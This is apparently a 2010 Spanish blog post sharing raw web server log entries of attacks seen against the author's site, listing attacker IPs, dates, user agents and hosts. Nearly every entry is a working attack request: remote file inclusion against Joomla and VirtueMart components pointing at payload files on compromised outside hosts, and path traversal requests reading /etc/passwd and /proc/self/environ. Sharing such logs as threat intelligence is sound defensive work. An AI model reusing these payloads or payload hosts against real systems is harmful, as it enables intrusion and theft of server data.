Attackers and zombie webs
Os dejo ésta interesante lista de los últimos sitios atacantes, infectados, y utilizados por para enviar spam, RFI, botnets, robo de datos y realizar actividades criminales de todo tipo.
IP / Fecha / URL / Agente de usuario / HOST
208.110.132.7–[06-01-2010] ///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.batdongsanotc.com/.cok/P1.txt? User Agent: Mozilla/5.0
Host: (ipnshosting.com) cp1ips.ipnshosting.com
69.175.61.50–[05-31-2010] http://www.boomong.com/bbs//data/1.txt?? User Agent: Mozilla/5.0 Host: (justhost.com) cl49.justhost.com
121.190.102.21–[05-31-2010] http://www.pyungsan.or.kr/bbs/id1.txt??? User Agent: Mozilla/5.0 Host: (121.190.102.21) 121.190.102.21
74.55.135.18 –[05-26-2010] Última URL: /?_SERVERDOCUMENT_ROOT=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? User Agent: Mozilla/5.0 Host: (theplanet.com) 12.87.374a.static.theplanet.com
121.190.102.21–[05-31-2010] http://www.pyungsan.or.kr/bbs/id1.txt??? User Agent: Mozilla/5.0 Host: (121.190.102.21) 121.190.102.21
69.175.61.50–[05-31-2010] http://www.boomong.com/bbs//data/1.txt?? User Agent: Mozilla/5.0 Host: (justhost.com) cl49.justhost.com
74.50.85.15–[05-30-2010] /http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? User Agent: Mozilla/5.0 Host: (74.50.85.15) 74.50.85.15
205.234.101.201–[05-30-2010] http://scalaris.ru///05bfe1fb99b763311ac2bac4d5bebcda/id.txt? User Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6 Host: (defenderhosting.com) unknown201.101.234.205.defenderhosting.com
64.22.67.37 — [05-30-2010] /components/com_virtuemart/errors.php?error=http://dochoicuabe.info//tmp/id1.txt?? User Agent: Mozilla/5.0 Host: (sourcedns1.com) d5.sourcedns1.com
118.82.114.113–[05-30-2010] //include/scripts/export_batch.inc.php?DIR=http://www.spread.xx/xx.xx??&u=x User Agent: Mozilla/4.61 [en] (OS/2; U) Host: (secure.jp) e2084.secure.jp
85.94.33.242–[05-30-2010] //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.spread.xx/xx.xx??&load=cmdx User Agent: Mozilla/4.8 [en] (Windows NT 5.0; U) Host: (mcn.ru) tagus.mcn.ru
114.108.177.125–[05-29-2010] /?path=http://delpatiord.net/v5/id1.txt???? User Agent: Mozilla/5.0 Host: (114.108.177.125) 114.108.177.125
212.241.251.224–[05-29-2010] /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.spread.xx/xx.xx??&u=x User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0 Host: (turbodns.co.uk) ds2714.dedicated.turbodns.co.uk
189.38.90.30–[05-29-2010] /?p=http://www.spread.xx/xx.xx??&u=x User Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox Host: (uni5.net) drama.uni5.net
69.175.83.34–[05-29-2010] /%20%20/security/include/_class.security.php=http://tjdhosp.co.kr/data/session/byz9991.txt User Agent: Mozilla/5.0 Host: (.) .
116.122.36.34–[05-28-2010] //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://train.webologysolutions.com//cache/jackz/id1.txt??? User Agent: Mozilla/5.0 Host: (116.122.36.34) 116.122.36.34
62.43.194.164–[05-28-2010] /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://alaindaloz.fr//baner.txt??? User Agent: Mozilla/5.0 Host: (ono.com) 62.43.194.164.static.user.ono.com
67.228.65.114–[05-28-2010] /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? User Agent: Mozilla/5.0 Host: (softlayer.com) 67.228.65.114-static.reverse.softlayer.com
208.38.190.72–[05-28-2010] /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt?
User Agent: Mozilla/5.0 Host: (johnsteel.net) server1.johnsteel.net
121.254.172.27 –[05-28-2010 /includes/include_once.php?include_file=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? User Agent: Mozilla/5.0
Host: (co.kr) teacherclub.co.kr
66.135.61.13 --[05-28-2010] /_head.php?_zb_path=http://www.boomong.com//bbs/data/idxx.txt? User Agent: Mozilla/5.0 Host: (jamasoftware.com) jamasoftware.com
174.37.143.198 –[05-28-2010] http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? User Agent: Mozilla/5.0 Host: (flexihostings.net) avatar.flexihostings.net
74.55.96.234–[05-27-2010] /?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.ovohely.hu/assets/images/autogen/ts?? User Agent: Microsoft Pocket Internet Explorer/0.6 Host: (easyhostsolutions.net) server102.easyhostsolutions.net
69.175.51.250 –05-26-2010] //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pastie.org/965941.txt?? User Agent: Mozilla/5.0 Host: (justhost.com) cl43.justhost.com
218.149.84.14–05-26-2010] /2010/03/herramientas-usadas-por-script-kiddies//skin/zero_vote/error.php?dir=http://www.leehongsun.com//id1.txt? User Agent: Mozilla/5.0 Host: (218.149.84.14) 218.149.84.14
84.40.30.37–[05-26-2010] /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? User Agent: Mozilla/5.0 Host: (siteprotect.com) ltf1010.tam.us.siteprotect.com
64.71.32.29–[05-23-2010 18:00]: /?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 User Agent: libwww-perl/5.813 Host: (siteprotect.com) lsh1016.lsh.siteprotect.com
89.108.66.144–[05-23-2010 17:44]: /?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 User Agent: libwww-perl/5.812 Host: (agava.net) cp33.agava.net
211.115.111.115–[05-23-2010 12:44] /?option=com_virtuemart&page=…_absolute_path=http://halupa.org.ua//plugins/sh/id1.txt???? User Agent: Mozilla/5.0 Host: (nadohomepage.com) hosting.nadohomepage.com
81.169.175.150–[05-23-2010 05:07] /?ver=./../../../../../../../../etc/passwd User Agent: unknown Host: (serverkompetenz.net) h100754.serverkompetenz.net
87.252.3.123–[05-23-2010 02:56] http://www.tributetohallyday.fr//components/com_artforms/assets/captcha/includes/captchaform/test.txt??? User Agent: Mozilla/5.0 (Windows NT 5.1; it; rv:1.8.1b2) Host: (playbactest.fr) ns1.playbactest.fr
174.37.143.198–[05-23-2010 02:29] /2010//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? User Agent: Mozilla/5.0 Host: (flexihostings.net) avatar.flexihostings.net
174.142.61.152–[05-20-2010 07:47] …/Blowfish/CBC.php?mosConfig.absolute.path=http://marcelotdf.com.ar/logs/ts?? User Agent: MOT-MPx220/1.400 Mozilla/4.0 (Windows CE; Smartphone; Host: (com.mk) s1.next-em.com.mk
121.190.102.21–[05-20-2010 06:10] /english///?path=http://dive2world.com/newdive/1.txt???User Agent: Mozilla/5.0 Host: (121.190.102.21) 121.190.102.21
112.216.153.186– [05-19-2010 12:59] /%20%20//skin/ggambo6210_board/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? User Agent: Mozilla/5.0 Host: (112.216.153.186) 112.216.153.186
204.202.2.23– [05-19-2010 12:54] /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.connclan.net:8080/albums/id.gif? User Agent: Mozilla/5.0 Host: (calodges.org) www.calodges.org
202.69.230.122– [05-18-2010 07:59] /category/noticias/?cat=10&paged=5/////////////////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fkortech.cn%2Fbbs%2Fid1.txt%3F User Agent: Mozilla/5.0 Host: (co.jp) persevere.co.jp
81.208.34.38– [05-18-2010 07:52] /?_SERVERDOCUMENT_ROOT=http://phamsight.com/docs/images/head?? User Agent: Mozilla/5.0 Host: (fastwebnet.it) 81-208-34-38.ip.fastwebnet.it
189.16.34.178– [05-18-2010 03:38] /%20%20/include/print_category.php?setup[use_category]=1&dir=http://pixain.sitebr.net/fx29id1.txt?? User Agent: Mozilla/5.0 Host: (189.16.34.178) 189.16.34.178
174.142.214.4– [05-17-2010 07:43] /%20%20//?_zb_path=http://nic.bupt.edu.cn/media/j1.txt?? User Agent: Mozilla/5.0 Host: (174.142.214.4) 174.142.214.4
64.128.80.17–[05-16-2010 11:07] /slogin_lib.inc.php?slogin_path=http://forum.c4evn.org/id1.txt?? User Agent: Mozilla/5.0 Host: (networkredux.net) valleyforge.networkredux.net
91.121.71.175–[05-16-2010 11:04] /slogin_lib.inc.php?slogin_path=http://forum.c4evn.org/id1.txt?? User Agent: Mozilla/5.0 Host: (kimsufi.com) ks26299.kimsufi.com
90.156.196.18–[05-16-2010 11:04] /slogin_lib.inc.php?slogin_path=http://forum.c4evn.org/id1.txt?? User Agent: Mozilla/5.0 Host: (masterhost.ru) dbe8.shared.masterhost.ru
206.210.68.43–[05-15-2010 07:10] /include/write.php?dir=http://www.ingforest.ba/1.gif?? User Agent: Mozilla/5.0 Host: (expedient.net) corp02.web.pitdc1.expedient.net
122.201.71.67–[05-14-2010 04:29] /include/print_category.php?setup[use_category]=1&dir=http://www.darkhorseproductions.com/includes/js/copyright.txt???? User Agent: Mozilla/5.0 Host: (redgumhosting.com) host.redgumhosting.com
118.129.167.62–[05-14-2010 02:26] /%20%20//include/print_category.php?setup[use_category]=1&dir=http://anfar4.fileave.com/id1.txt? User Agent: Mozilla/5.0 Host: (118.129.167.62) 118.129.167.62
69.94.137.93–[05-14-2010 01:47] /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http%3A%2F%2Fphamsight.com%2Fdocs%2Fimages%2Fhead%3F%3F User Agent: Mozilla/5.0 Host: (69.94.137.93) 69.94.137.93
216.150.224.151–[05-13-2010 01:04] /?_SERVERDOCUMENT_ROOT=http://phamsight.com/docs/images/head????? User Agent: Mozilla/5.0 Host: (webandnetworksolutions.com) 216-150-224-151.static.webandnetworksolutions.com
151.1.210.48–[05-12-2010 04:15] /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? User Agent: Mozilla/5.0 Host: (it.net) server6-i-dome.it.net
173.236.37.202–[05-12-2010 10:58] /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt? User Agent: Mozilla/5.0 Host: (justhost.com) cl154.justhost.com
222.236.47.182–[05-12-2010 06:44] /?template=http://mpress.com.ua///templates/zfxid1.txt??? User Agent: Mozilla/5.0 Host: (222.236.47.182) 222.236.47.182
125.247.249.195–[05-11-2010 12:21] /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.krdi.com/gnuboard4/data/x1.txt? User Agent: Mozilla/5.0 Host: (125.247.249.195) 125.247.249.195
204.15.190.163–[05-09-2010 09:48] /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http%3A%2F%2Fphamsight.com%2Fdocs%2Fimages%2Fhead%3F%3F User Agent: Mozilla/5.0 Host: (switchworks.net) H163.C190.tor.switchworks.net
94.46.2.21–[05-09-2010 08:40] /?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt? User Agent: Mozilla/5.0 Host: (nauinfor.net) ns.nauinfor.ne
204.188.235.66–[05-07-2010 05:26] /*.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck Host: (204.188.235.66) 204.188.235.6
74.46.190.110–[05-07-2010 08:19] /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=www.boomong.com%2Fbbs%2F%2Fdata%2F1.txt%3F%3F%3F User Agent: Mozilla/5.0 Host: (twtelecom.net) 174-46-190-110.static.twtelecom.net
91.121.30.72–[05-06-2010 11:38] /*.php?option=com_myblog&itemid=&task=../../../../../../../../../../../../../../../../etc/passwd%00 User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: (ovh.net) ns300263.ovh.net
83.103.70.86–[05-06-2010 10:26] /*.php?option=com_myblog&itemid=&task=../../../../../../../../../../../../../../../../etc/passwd%00 User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1 Host: (fastwebnet.it) 83-103-70-86.ip.fastwebnet.it
64.64.0.138–[05-06-2010 10:23] /*.php?option=com_myblog&itemid=&task=../../../../../../../../../../../../../../../../etc/passwd%00 User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2 Host: (liftforlife.com) vps.liftforlife.com
206.214.219.125–[05-06-2010 10:23] /*.php?option=com_myblog&itemid=&task=../../../../../../../../../../../../../../../../etc/passwd%00 User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck Host: (yatko.com) host3.yatko.com
83.223.104.50–[05-06-2010 10:23] /*.php?option=com_myblog&itemid=&task=../../../../../../../../../../../../../../../../etc/passwd%00 User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2 Host: (ns-metis.com) nativespace-metis.ns-metis.com
67.225.154.24–[05-06-2010 10:23] /*.php?option=com_myblog&itemid=&task=../../../../../../../../../../../../../../../../etc/passwd%00 User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1 Host: (01domain.net) server37.01domain.net
174.121.67.233–[05-06-2010 10:23] /*.php?option=com_myblog&itemid=&task=../../../../../../../../../../../../../../../../etc/passwd%00 User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1 Host: (theplanet.com) e9.43.79ae.static.theplanet.com
79.174.72.149–[05-06-2010 10:23] /*.php?option=com_myblog&itemid=&task=../../../../../../../../../../../../../../../../etc/passwd%00 User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1 Host: (hc.ru) cf6.hc.ru
69.175.41.51–[05-06-2010 10:23] *.php?option=com_myblog&itemid=&task=../../../../../../../../../../../../../../../../etc/passwd%00 User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1 Host: (tmdhosting310.com) ns1.tmdhosting310.com
85.19.150.100–[05-06-2010 10:23] /*.php?option=com_myblog&itemid=&task=../../../../../../../../../../../../../../../../etc/passwd%00 User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck Host: (fastname.no) linux7.fastname.no
193.41.235.46–[05-06-2010 10:22] /*.php?option=com_myblog&itemid=&task=../../../../../../../../../../../../../../../../etc/passwd%00 User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1 Host: (servrent.net) sla.servrent.net
94.228.215.131–[05-05-2010 09:23] /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? User Agent: Mozilla/5.0 Host: (94.228.215.131) 94.228.215.131
61.254.103.250–[05-04-2010 02:30] /components/com_virtuemart/…=http://www.maratechengineering.com/zen-cart/images/dvd/test.txt?? User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2 Host: (61.254.103.250) 61.254.103.250
216.131.91.180–[05-03-2010 12:33] /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http%3A%2F%2Ftelleriasnunez.com%2Fid1.txt%3F%3F User Agent: Mozilla/5.0 Host: (reliablehosting.com) fs10.reliablehosting.com
84.40.30.3–[05-03-2010 06:15] /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http%3A%2F%2Fdive2world.com%2Fnewdive%2F1.txt%3F%3F%3F%3F User Agent: Mozilla/5.0 Host: (siteprotect.com) ltf1010.tam.us.siteprotect.com
210.125.133.87–[05-02-2010 04:38] /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? User Agent: Mozilla/5.0 Host: (210.125.133.87) 210.125.133.87
64.22.100.83–[05-02-2010 04:31] /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? User Agent: Mozilla/5.0 Host: (ez-web-hosting.com) ez22.ez-web-hosting.co
72.26.122.245–[05-02-2010 02:54] /errors.php?error=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? User Agent: Mozilla/5.0 Host: (sietch.com) choam.sietch.com
78.110.50.119–[05-01-2010 11:32] /?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.manosdelalma.cl/help/ts???? User Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 Host: (ht-systems.ru) c17-w.ht-systems.ru
115.124.119.4–[04-30-2010 06:04] /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.terrypratchettbooks.us/includes/domit/P1.txt? User Agent: Mozilla/5.0 Host: (yorkinterweb.net) zias.yorkinterweb.net
204.48.128.30–[04-30-2010 05:30] /?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.frenchvineyards.fr/images/stories/news/img/test.txt??? User Agent: Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515) Host: (sbceo.org) server1.sbceo.org
77.221.130.13–[04-28-2010 06:02] /include/print_category.php?setup[use_category]=1&dir=http://nic.bupt.edu.cn/media/j1.txt? User Agent: Mozilla/5.0 Host: (infobox.ru) srv013.infobox.ru
Deje una contestacion